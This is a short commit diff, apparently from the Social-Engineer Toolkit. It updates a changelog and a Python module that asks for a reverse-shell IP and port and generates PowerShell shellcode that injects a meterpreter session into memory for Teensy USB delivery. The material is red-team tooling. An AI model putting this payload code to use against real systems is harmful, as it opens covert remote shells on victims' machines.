fixed teensy deployment

This commit is contained in:
TrustedSec 2015-08-04 20:30:07 -04:00
parent 0f91c79614
commit 4057962906
2 changed files with 10 additions and 2 deletions

View file

@ -4,6 +4,7 @@ version 6.5.2
* added smallest payload option for msfvenom shellcode creation
* added automatic start of apache on hta attack
* fixed powershell teensy deployment
~~~~~~~~~~~~~~~~
version 6.5.1

View file

@ -1,6 +1,7 @@
#!/usr/bin/python
import pexpect
from src.core.setcore import *
import time
print """
The powershell - shellcode injection leverages powershell to send a meterpreter session straight into memory without ever touching disk.
@ -16,10 +17,16 @@ filewrite = file(setdir + "/metasploit.payload", "w")
filewrite.write(payload)
filewrite.close()
import src.payloads.powershell.prep
ipaddr = raw_input("Enter the IP for the reverse: ")
port = raw_input("Enter the port for the reverse: ")
shellcode = generate_powershell_alphanumeric_payload(payload,ipaddr,port, "")
filewrite = file(setdir + "/x86.powershell", "w")
filewrite.write(shellcode)
filewrite.close()
time.sleep(3)
fileopen = file(setdir + "/x86.powershell", "r")
#payload_encoded = fileopen.read()
# read in x amount of bytes
data_read = int(50)